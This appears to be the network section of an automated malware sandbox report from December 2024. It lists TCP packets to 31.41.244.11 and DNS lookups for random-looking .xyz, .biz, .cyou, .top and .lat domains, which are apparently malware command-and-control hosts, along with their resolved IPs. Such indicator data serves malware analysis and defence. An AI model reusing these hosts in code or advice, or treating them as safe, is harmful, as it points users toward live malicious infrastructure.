Dec 17, 2024 06:03:43.683854103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.684731007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.684746981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.684793949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.685765982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.685815096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.686090946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.686139107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.686922073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.686966896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.687360048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.687407017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.688010931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.688241959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.688287020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.688956022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.688999891 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.689069986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.689115047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.689697981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.689713001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.689743996 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.689757109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.690462112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.690476894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.690520048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.693105936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.693120956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.693160057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.693958998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.694005966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.694088936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.694135904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.694205999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.694248915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.694500923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.694545031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.695363998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.695408106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.695523977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.695566893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.696439981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.696651936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.696696043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.697372913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.697417974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.697575092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.697618008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.698487043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.698529959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.698617935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.698659897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.699436903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.699451923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.699496031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.700620890 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.700753927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.700809956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.701770067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.701785088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.701814890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.701842070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.702718973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.702869892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.702917099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.703739882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.703783989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.703936100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.704950094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.705005884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.705104113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.705146074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.705945969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.705960035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.705990076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.706003904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.707020998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.707137108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.707182884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.708049059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.708229065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.708276033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.709031105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.709074974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.709155083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.709202051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.710155964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.710201025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.710417032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.710458040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.711220026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.711265087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.711354017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.711399078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.712307930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.712480068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.712527037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.713320017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.713366032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.713433027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.713478088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.714437962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.714452982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.714477062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.714493990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.715599060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.715869904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.715883970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.715928078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.716662884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.716679096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.716706991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.716720104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.717515945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.717530966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.717577934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.717955112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.718003035 CET	49902	80	192.168.2.5	31.41.244.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 06:03:14.327568054 CET	192.168.2.5	1.1.1.1	0xb83a	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:14.561873913 CET	192.168.2.5	1.1.1.1	0xcbad	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:15.561978102 CET	192.168.2.5	1.1.1.1	0xcbad	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:17.700628042 CET	192.168.2.5	1.1.1.1	0x1cba	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:18.715600014 CET	192.168.2.5	1.1.1.1	0x1cba	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.227020025 CET	192.168.2.5	1.1.1.1	0x6f26	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.453048944 CET	192.168.2.5	1.1.1.1	0xa325	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.595702887 CET	192.168.2.5	1.1.1.1	0x86e2	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.821500063 CET	192.168.2.5	1.1.1.1	0xdf00	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.051544905 CET	192.168.2.5	1.1.1.1	0xd2c3	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.277076006 CET	192.168.2.5	1.1.1.1	0x1b1d	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.589303970 CET	192.168.2.5	1.1.1.1	0x474f	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:47.942106009 CET	192.168.2.5	1.1.1.1	0x2678	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:47.942161083 CET	192.168.2.5	1.1.1.1	0x1624	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 17, 2024 06:03:51.369167089 CET	192.168.2.5	1.1.1.1	0x5a23	Standard query (0)	home.fivetk5pn.top	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:51.369229078 CET	192.168.2.5	1.1.1.1	0xea9b	Standard query (0)	home.fivetk5pn.top	28	IN (0x0001)	false
Dec 17, 2024 06:03:54.934791088 CET	192.168.2.5	1.1.1.1	0x6dd5	Standard query (0)	home.fivetk5pn.top	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:54.934847116 CET	192.168.2.5	1.1.1.1	0x8a1e	Standard query (0)	home.fivetk5pn.top	28	IN (0x0001)	false
Dec 17, 2024 06:03:55.959520102 CET	192.168.2.5	1.1.1.1	0x5ec	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.234308958 CET	192.168.2.5	1.1.1.1	0xc31f	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.234447002 CET	192.168.2.5	1.1.1.1	0x593b	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.262192011 CET	192.168.2.5	1.1.1.1	0x4cd8	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.272764921 CET	192.168.2.5	1.1.1.1	0xa702	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.301460028 CET	192.168.2.5	1.1.1.1	0xb580	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.330790997 CET	192.168.2.5	1.1.1.1	0x34bf	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.400542974 CET	192.168.2.5	1.1.1.1	0xa8fe	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.404100895 CET	192.168.2.5	1.1.1.1	0x3e66	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.405617952 CET	192.168.2.5	1.1.1.1	0xfe15	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.457335949 CET	192.168.2.5	1.1.1.1	0x41d3	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.471927881 CET	192.168.2.5	1.1.1.1	0x5e9c	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.546808004 CET	192.168.2.5	1.1.1.1	0x2294	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.550846100 CET	192.168.2.5	1.1.1.1	0x7a58	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.550846100 CET	192.168.2.5	1.1.1.1	0x9238	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.565783024 CET	192.168.2.5	1.1.1.1	0xbab1	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.696357965 CET	192.168.2.5	1.1.1.1	0xe7e1	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.696829081 CET	192.168.2.5	1.1.1.1	0x8e61	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.706358910 CET	192.168.2.5	1.1.1.1	0x36d9	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.834772110 CET	192.168.2.5	1.1.1.1	0x47f6	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.838695049 CET	192.168.2.5	1.1.1.1	0x7ec	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.847084999 CET	192.168.2.5	1.1.1.1	0x41	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.974183083 CET	192.168.2.5	1.1.1.1	0x96c5	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:16.985682011 CET	192.168.2.5	1.1.1.1	0xeb6b	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.114571095 CET	192.168.2.5	1.1.1.1	0x1c8	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.123699903 CET	192.168.2.5	1.1.1.1	0xde0f	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:17.253144026 CET	192.168.2.5	1.1.1.1	0xaef5	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:17.630239964 CET	192.168.2.5	1.1.1.1	0x252b	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.630634069 CET	192.168.2.5	1.1.1.1	0x2aa2	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.632874012 CET	192.168.2.5	1.1.1.1	0x2fd5	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.691365957 CET	192.168.2.5	1.1.1.1	0x9b40	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.834201097 CET	192.168.2.5	1.1.1.1	0xfb8f	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:18.727653027 CET	192.168.2.5	1.1.1.1	0x6d77	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:18.727781057 CET	192.168.2.5	1.1.1.1	0xf137	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 17, 2024 06:04:19.176868916 CET	192.168.2.5	1.1.1.1	0x5b84	Standard query (0)	fivetk5pn.top	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.176923037 CET	192.168.2.5	1.1.1.1	0x90c8	Standard query (0)	fivetk5pn.top	28	IN (0x0001)	false
Dec 17, 2024 06:04:19.746524096 CET	192.168.2.5	1.1.1.1	0xea3a	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.746568918 CET	192.168.2.5	1.1.1.1	0xcc41	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.746781111 CET	192.168.2.5	1.1.1.1	0xcf53	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.884155035 CET	192.168.2.5	1.1.1.1	0x9aa5	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885757923 CET	192.168.2.5	1.1.1.1	0x8d50	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.954612970 CET	192.168.2.5	1.1.1.1	0x1772	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.024812937 CET	192.168.2.5	1.1.1.1	0xe32	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:20.025257111 CET	192.168.2.5	1.1.1.1	0x3c2d	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:20.093456984 CET	192.168.2.5	1.1.1.1	0xe418	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 17, 2024 06:04:20.164084911 CET	192.168.2.5	1.1.1.1	0xc4ad	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.166255951 CET	192.168.2.5	1.1.1.1	0xb303	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.232548952 CET	192.168.2.5	1.1.1.1	0xcf6c	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.303322077 CET	192.168.2.5	1.1.1.1	0x8f82	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.303985119 CET	192.168.2.5	1.1.1.1	0x5e55	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.371721029 CET	192.168.2.5	1.1.1.1	0x400d	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.442070007 CET	192.168.2.5	1.1.1.1	0xde79	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:20.442301989 CET	192.168.2.5	1.1.1.1	0x2c5a	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:20.512159109 CET	192.168.2.5	1.1.1.1	0xb392	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:22.241693020 CET	192.168.2.5	1.1.1.1	0x9b6	Standard query (0)	fivetk5pn.top	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:22.241734028 CET	192.168.2.5	1.1.1.1	0xcd4	Standard query (0)	fivetk5pn.top	28	IN (0x0001)	false
Dec 17, 2024 06:04:23.194685936 CET	192.168.2.5	1.1.1.1	0x38b7	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:25.438414097 CET	192.168.2.5	1.1.1.1	0x4c12	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:25.438540936 CET	192.168.2.5	1.1.1.1	0xf6d1	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 17, 2024 06:04:26.433537960 CET	192.168.2.5	1.1.1.1	0x430c	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:26.433670998 CET	192.168.2.5	1.1.1.1	0xfdda	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 17, 2024 06:04:35.122363091 CET	192.168.2.5	1.1.1.1	0xf183	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 17, 2024 06:04:45.959439993 CET	192.168.2.5	1.1.1.1	0xff10	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:45.974644899 CET	192.168.2.5	1.1.1.1	0x9529	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.015516996 CET	192.168.2.5	1.1.1.1	0x2fae	Standard query (0)	normandy.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.098422050 CET	192.168.2.5	1.1.1.1	0x96c0	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 17, 2024 06:04:46.113198996 CET	192.168.2.5	1.1.1.1	0x7994	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.164509058 CET	192.168.2.5	1.1.1.1	0x230e	Standard query (0)	normandy-cdn.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.253689051 CET	192.168.2.5	1.1.1.1	0xbf1b	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 17, 2024 06:04:46.312496901 CET	192.168.2.5	1.1.1.1	0xac2d	Standard query (0)	normandy-cdn.services.mozilla.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 06:03:14.550790071 CET	1.1.1.1	192.168.2.5	0xb83a	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019651890 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019651890 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019651890 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019665003 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019665003 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:16.019665003 CET	1.1.1.1	192.168.2.5	0xcbad	No error (0)	immureprech.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146301031 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146301031 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146301031 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146332026 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146332026 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:19.146332026 CET	1.1.1.1	192.168.2.5	0x1cba	No error (0)	deafeninggeh.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.451351881 CET	1.1.1.1	192.168.2.5	0x6f26	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.591922998 CET	1.1.1.1	192.168.2.5	0xa325	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:21.815720081 CET	1.1.1.1	192.168.2.5	0x86e2	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.047837019 CET	1.1.1.1	192.168.2.5	0xdf00	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.273773909 CET	1.1.1.1	192.168.2.5	0xd2c3	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.587552071 CET	1.1.1.1	192.168.2.5	0x1b1d	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:22.726418972 CET	1.1.1.1	192.168.2.5	0x474f	No error (0)	steamcommunity.com		104.121.10.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:48.366936922 CET	1.1.1.1	192.168.2.5	0x2678	No error (0)	httpbin.org		98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:48.366936922 CET	1.1.1.1	192.168.2.5	0x2678	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:52.148122072 CET	1.1.1.1	192.168.2.5	0x5a23	No error (0)	home.fivetk5pn.top		104.154.220.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:55.072710037 CET	1.1.1.1	192.168.2.5	0x6dd5	No error (0)	home.fivetk5pn.top		104.154.220.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:56.277935028 CET	1.1.1.1	192.168.2.5	0x5ec	No error (0)	sweepyribs.lat		104.21.2.110	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:03:56.277935028 CET	1.1.1.1	192.168.2.5	0x5ec	No error (0)	sweepyribs.lat		172.67.129.27	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.248368025 CET	1.1.1.1	192.168.2.5	0x3e28	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.373013973 CET	1.1.1.1	192.168.2.5	0x593b	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
